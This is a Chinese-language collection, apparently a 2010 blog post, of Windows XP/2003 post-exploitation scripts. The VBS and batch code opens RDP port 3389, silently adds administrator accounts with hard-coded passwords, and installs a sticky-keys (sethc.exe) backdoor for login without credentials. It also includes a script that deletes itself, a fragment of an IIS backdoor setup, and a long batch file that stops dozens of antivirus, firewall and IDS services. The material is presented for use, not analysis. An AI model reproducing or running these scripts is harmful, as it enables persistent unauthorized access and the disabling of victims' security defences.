xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本+提权VBS 整理收集
xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本+提权VBS 整理收集
2010年12月07日
xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本
vbson error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
on error resume next
dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)
加用户
--------------------------------
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.regecho "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg
-------------------------------------------------
vbs加用户精简版
set w=createobject("wscript.shell"):w.run "net user hack echoeye /add",0:w.run "net localgroup administrators hack /add",0
-----------------------------------------------------
cmd.asp webshell 上传
---------------------------------------------------
--------------------------------
Shift后门
-----------------------------------------
@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后门 By:Hack残少 QQ:297248524
echo.
echo 使用方法:本文件执行完毕后,
echo 在终端界面按Shift 5次即可登陆系统!
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
echo 完成百分之 50
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
echo 完成百分之 80
attrib c:\windows\system32\sethc.exe +h
echo 完成百分之 90
attrib c:\windows\system32\dllcache\sethc.exe +h
echo 完成百分之 100
cls
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo 后门安装完毕!
echo.
echo 感谢您使用Shift后门
echo.
echo By:Hack残少 QQ:297248524
echo.
echo http://www.shenmicaobi.com/
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo. & pause
exit
--------------------------
不依靠CMD添加用户的VBS代码
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) '得到adsi接口,绑定
Set oe=GetObject(os&"/Administrators,group") '属性,admin组
Set od=ob.Create("user","test") '建立用户
od.SetPassword "1234" '设置密码
od.SetInfo '保存
Set of=GetObject(os&"/test",user) '得到用户
oe.add os&"/test"
------------------------------------------
用vbs实现本地添加用户的脚本
Dim WshShell
set WshShell = CreateObject("wscript.Shell")
WshShell.Run "cmd /k"
for i = 1 to 3
WScript.Sleep 500
WshShell.SendKeys "net user admin" & i & " abcd@123 /add"
WshShell.SendKeys "{ENTER}"
next
WshShell.SendKeys "exit"
WshShell.SendKeys "{ENTER}"
---------------------------------------------
上帝之门 执行成功 3389 管理员帐号任意密码登入 保存为.exe
------------------------
MZ
------------------------
IIs后门
-------------------
help1="IIS后门设置器 黑猫专用版"
help2="请输入正确的虚拟目录名称和映射的路径,格式如下"
help3=" cscript.exe iis.vbs 虚拟目录的名称 映射的路径"
help4="例如: cscript.exe iis.vbs lh e:"
set Args = Wscript.Arguments
if args.count telnet_tmp.vbs
echo WScript.Sleep 300 >>telnet_tmp.vbs
echo sh.SendKeys "open 192.168.1.200" >>telnet_tmp.vbs
echo WScript.Sleep 300 >>telnet_tmp.vbs
echo sh.SendKeys "{ENTER}" >>telnet_tmp.vbs
echo WScript.Sleep 300 >>telnet_tmp.vbs
echo sh.SendKeys "engineer{ENTER}" >>telnet_tmp.vbs
echo WScript.Sleep 300 >>telnet_tmp.vbs
echo sh.SendKeys "ls {ENTER}">>telnet_tmp.vbs
start telnet
cscript //nologo telnet_tmp.vbs
del telnet_tmp.vbs
附录:
对于SendKeys这个命令可以send什么,我们可以看下面的列表:
BACKSPACE {BACKSPACE}, {BS}, or {BKSP}
BREAK {BREAK}
CAPS LOCK {CAPSLOCK}
DEL or DELETE {DELETE} or {DEL}
DOWN ARROW {DOWN}
END {END}
ENTER {ENTER}or ~
ESC {ESC}
HELP {HELP}
HOME {HOME}
INS or INSERT {INSERT} or {INS}
LEFT ARROW {LEFT}
NUM LOCK {NUMLOCK}
PAGE DOWN {PGDN}
PAGE UP {PGUP}
PRINT SCREEN {PRTSC}
RIGHT ARROW {RIGHT}
SCROLL LOCK {SCROLLLOCK}
TAB {TAB}
UP ARROW {UP}
F1 {F1}
F2 {F2}
F3 {F3}
F4 {F4}
F5 {F5}
F6 {F6}
F7 {F7}
F8 {F8}
F9 {F9}
F10 {F10}
F11 {F11}
F12 {F12}
F13 {F13}
F14 {F14}
F15 {F15}
F16 {F16}
SHIFT +
CTRL ^
ALT %
二。Linux平台
保证你的系统上存在expect这个可执行程序,保存以下代码到文件autoTelnet,并给与执行权限。详细操作察看命令expect
#!/usr/bin/expect --
set SERVER "192.168.1"
set USER "myusername"
set PASSWD "mypass"
if { $argc } {
spawn telnet $SERVER.$argv
} else {
spawn telnet $SERVER.200
}
expect "Password:"
send "$PASSWD\n"
expect "#"
send "ls\n"
interact
关闭防火墙和杀毒软件的脚本
@echo off
net stop "Ecengine.exe" /y
net stop "eSafe Protect Desktop" /y
net stop "Esafe.exe" /y
net stop "Espwatch.exe" /y
net stop "eTrust EZ Firewall" /y
net stop "F-Agnt95.exe" /y
net stop "Findviru.exe" /y
net stop "Fprot.exe" /y
net stop "F-Prot.exe" /y
net stop "F-PROT95" /y
net stop "F-Prot95.exe" /y
net stop "FP-WIN" /y
net stop "Fp-Win.exe" /y
net stop "Freedom 2" /y
net stop "Frw.exe" /y
net stop "F-STOPW" /y
net stop "F-Stopw.exe" /y
net stop "GNAT Box Lite" /y
net stop "IAMAPP" /y
net stop "Iamapp.exe" /y
net stop "Iamserv.exe" /y
net stop "Ibmasn.exe" /y
net stop "Ibmavsp.exe" /y
net stop "Icload95.exe" /y
net stop "Icloadnt.exe" /y
net stop "ICMON" /y
net stop "Icmon.exe" /y
net stop "Icsupp95.exe" /y
net stop "Icsuppnt.exe" /y
net stop "Iface.exe" /y
net stop "Internet Alert 99" /y
net stop "IOMON98" /y
net stop "Iomon98.exe" /y
net stop "Jedi.exe" /y
net stop "LOCKDOWN2000" /y
net stop "Lockdown2000.exe" /y
net stop "Look'n'Stop" /y
net stop "Look'n'Stop Lite" /y
net stop "Lookout.exe" /y
net stop "LUALL" /y
net stop "Luall.exe" /y
net stop "LUCOMSERVER" /y
net stop "MCAFEE" /y
net stop "McAfee Firewall" /y
net stop "McAfee Internet Guard Dog Pro" /y
net stop "Moolive.exe" /y
net stop "Mpftray.exe" /y
net stop "N32scanw.exe" /y
net stop "NAVAPSVC" /y
net stop "NAVAPW32" /y
net stop "Navapw32.exe" /y
net stop "NAVLU32" /y
net stop "Navlu32.exe" /y
net stop "Navnt.exe" /y
net stop "NAVRUNR" /y
net stop "NAVW32" /y
net stop "Navw32.exe" /y
net stop "NAVWNT" /y
net stop "Navwnt.exe" /y
net stop "NeoWatch" /y
net stop "NISSERV" /y
net stop "NISUM" /y
net stop "Nisum.exe" /y
net stop "NMAIN" /y
net stop "Nmain.exe" /y
net stop "Norman Personal Firewall" /y
net stop "Normist.exe" /y
net stop "NORTON" /y
net stop "Norton AntiVirus Server" /y
net stop "Norton Internet Security" /y
net stop "Norton Personal Firewall 2001" /y
net stop "Nupgrade.exe" /y
net stop "NVC95" /y
net stop "Nvc95.exe" /y
net stop "Outpost.exe" /y
net stop "Padmin.exe" /y
net stop "Pavcl.exe" /y
net stop "Pavsched.exe" /y
net stop "Pavw.exe" /y
net stop "Pc firewall" /y
net stop "PC Viper" /y
net stop "PCCIOMON" /y
net stop "Ecengine.exe" /y
net stop "eSafe Protect Desktop" /y
net stop "Esafe.exe" /y
net stop "Espwatch.exe" /y
net stop "eTrust EZ Firewall" /y
net stop "F-Agnt95.exe" /y
net stop "Findviru.exe" /y
net stop "Fprot.exe" /y
net stop "F-Prot.exe" /y
net stop "F-PROT95" /y
net stop "F-Prot95.exe" /y
net stop "FP-WIN" /y
net stop "Fp-Win.exe" /y
net stop "Freedom 2" /y
net stop "Frw.exe" /y
net stop "F-STOPW" /y
net stop "F-Stopw.exe" /y
net stop "GNAT Box Lite" /y
net stop "IAMAPP" /y
net stop "Iamapp.exe" /y
net stop "Iamserv.exe" /y
net stop "Ibmasn.exe" /y
net stop "Ibmavsp.exe" /y
net stop "Icload95.exe" /y
net stop "Icloadnt.exe" /y
net stop "ICMON" /y
net stop "Icmon.exe" /y
net stop "Icsupp95.exe" /y
net stop "Icsuppnt.exe" /y
net stop "Iface.exe" /y
net stop "Internet Alert 99" /y
net stop "IOMON98" /y
net stop "Iomon98.exe" /y
net stop "Jedi.exe" /y
net stop "LOCKDOWN2000" /y
net stop "Lockdown2000.exe" /y
net stop "Look'n'Stop" /y
net stop "Look'n'Stop Lite" /y
net stop "Lookout.exe" /y
net stop "LUALL" /y
net stop "Luall.exe" /y
net stop "LUCOMSERVER" /y
net stop "MCAFEE" /y
net stop "McAfee Firewall" /y
net stop "McAfee Internet Guard Dog Pro" /y
net stop "Moolive.exe" /y
net stop "Mpftray.exe" /y
net stop "N32scanw.exe" /y
net stop "NAVAPSVC" /y
net stop "NAVAPW32" /y
net stop "Navapw32.exe" /y
net stop "NAVLU32" /y
net stop "Navlu32.exe" /y
net stop "Navnt.exe" /y
net stop "NAVRUNR" /y
net stop "NAVW32" /y
net stop "Navw32.exe" /y
net stop "NAVWNT" /y
net stop "Navwnt.exe" /y
net stop "NeoWatch" /y
net stop "NISSERV" /y
net stop "NISUM" /y
net stop "Nisum.exe" /y
net stop "NMAIN" /y
net stop "Nmain.exe" /y
net stop "Norman Personal Firewall" /y
net stop "Normist.exe" /y
net stop "NORTON" /y
net stop "Norton AntiVirus Server" /y
net stop "Norton Internet Security" /y
net stop "Norton Personal Firewall 2001" /y
net stop "Nupgrade.exe" /y
net stop "NVC95" /y
net stop "Nvc95.exe" /y
net stop "Outpost.exe" /y
net stop "Padmin.exe" /y
net stop "Pavcl.exe" /y
net stop "Pavsched.exe" /y
net stop "Pavw.exe" /y
net stop "Pc firewall" /y
net stop "PC Viper" /y
net stop "PCCIOMON" /y
net stop "PCCMAIN" /y
net stop "PCCWIN98" /y
net stop "Pccwin98.exe" /y
net stop "Pcfwallicon.exe" /y
net stop "Persfw.exe" /y
net stop "PGP Gauntlet" /y
net stop "POP3TRAP" /y
net stop "Proxy +" /y
net stop "PVIEW95" /y
net stop "Rav7.exe" /y
net stop "Rav7win.exe" /y
net stop "Rescue.exe" /y
net stop "RESCUE32" /y
net stop "SAFEWEB" /y
net stop "Safeweb.exe" /y
net stop "Scan32.exe" /y
net stop "Scan95.exe" /y
net stop "Scanpm.exe" /y
net stop "Scrscan.exe" /y
net stop "Serv95.exe" /y
net stop "Smc.exe" /y
net stop "SMCSERVICE" /y
net stop "Snort - Win32 GUI" /y
net stop "Snort (Intrusion Detection System)" /y
net stop "Sphinx.exe" /y
net stop "Sphinxwall" /y
net stop "Sweep95.exe" /y
net stop "Sybergen Secure Desktop" /y
net stop "Sybergen SyGate" /y
net stop "SYMPROXYSVC" /y
net stop "Tbscan.exe" /y
net stop "Tca.exe" /y
net stop "Tds2-98.exe" /y
net stop "Tds2-Nt.exe" /y
net stop "TermiNET" /y
net stop "TGB:BOB" /y
net stop "Tiny Personal Firewall" /y
net stop "Vet95.exe" /y
net stop "Vettray.exe" /y
net stop "Vscan40.exe" /y
net stop "Vsecomr.exe" /y
net stop "VSHWIN32" /y
net stop "Vshwin32.exe" /y
net stop "VSSTAT" /y
net stop "Vsstat.exe" /y
net stop "WEBSCANX" /y
net stop "Webscanx.exe" /y
net stop "WEBTRAP" /y
net stop "Wfindv32.exe" /y
net stop "Wingate" /y
net stop "WinProxy" /y
net stop "WinRoute" /y
net stop "WyvernWorks Firewall" /y
net stop "Zonealarm" /y
net stop "Zonealarm.exe" /y
net stop "AVP32" /y
net stop "LOCKDOWN2000" /y
net stop "AVP.EXE" /y
net stop "CFINET32" /y
net stop "CFINET" /y
net stop "ICMON" /y
net stop "SAFEWEB" /y
net stop "WEBSCANX" /y
net stop "ANTIVIR" /y
net stop "MCAFEE" /y
net stop "NORTON" /y
net stop "NVC95" /y
net stop "FP-WIN" /y
net stop "IOMON98" /y
net stop "PCCWIN98" /y
net stop "F-PROT95" /y
net stop "F-STOPW" /y
net stop "PVIEW95" /y
net stop "NAVWNT /y
net stop "NAVRUNR" /y
net stop "NAVLU32" /y
net stop "NAVAPSVC" /y
net stop "NISUM" /y
net stop "SYMPROXYSVC" /y
net stop "RESCUE32" /y
net stop "NISSERV" /y
net stop "ATRACK" /y
net stop "IAMAPP" /y
net stop "LUCOMSERVER" /y
net stop "LUALL" /y
net stop "NMAIN" /y
net stop "NAVW32" /y
net stop "NAVAPW32" /y
net stop "VSSTAT" /y
net stop "VSHWIN32" /y
net stop "AVSYNMGR" /y
net stop "AVCONSOL" /y
net stop "WEBTRAP" /y
net stop "POP3TRAP" /y
net stop "PCCMAIN" /y
net stop "PCCIOMON" /y
net stop "Virtual CD v4 Security service (SDK - Version)" /y
net stop "Norton Internet Security Accounts Manager" /y
net stop "Norton AntiVirus Auto-Protect" /y
net stop "Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)" /y
net stop "Symantec Event Manager" /y
net stop "Symantec Proxy Service" /y
net stop "Symantec Settings Manager" /y
net stop "NT LM Security Support Provider" /y
net stop "Protected Storage" /y
net stop "TskSrv FTP Server" /y
net stop "Norton AntiVirus Auto Protect Service" /y
net stop "IPSEC Policy Agent" /y
net stop "MonSvcNT" /y
net stop "FTP Publishing Service" /y
net stop "IPSEC Services" /y
net stop "Symantec AntiVirus Client" /y
net stop "Sygate Personal Firewall" /y
net stop "AntiVir Service" /y
net stop "SafeNet IKE Service" /y
net stop "SafeNet Monitor Service" /y
net stop "Sophos Anti-Virus" /y
net stop "Sophos Anti-Virus Network" /y
net stop "Sophos Anti-Virus Update" /y
net stop "Firewall della connessione Internet (ICF) / Condivisione connessione Internet (ICS)" /y
net stop "Norton Unerase Protection" /y
net stop "Servizio Norton AntiVirus Auto-Protect" /y
net stop "FireDaemon Service: svchost." /y
net stop "V3MonNT" /y
net stop "PC-Keeper Service" /y
net stop "Verbindingsbeheer voor RAS" /y
net stop "Servizi IPSEC" /y
net stop "Agente criteri IPSEC" /y
net stop "McShield" /y
net stop "Smart Card" /y
net stop "F-Secure Anti-Virus Firewall Daemon" /y
net stop "F-Secure Automatic Update" /y
net stop "F-Secure Gatekeeper Handler Starter" /y
net stop "F-Secure Network Request Broker" /y
net stop "F-Secure Policy Manager Server" /y
net stop "Symantec AntiVirus" /y
net stop "Symantec AntiVirus Definition Watcher" /y
exit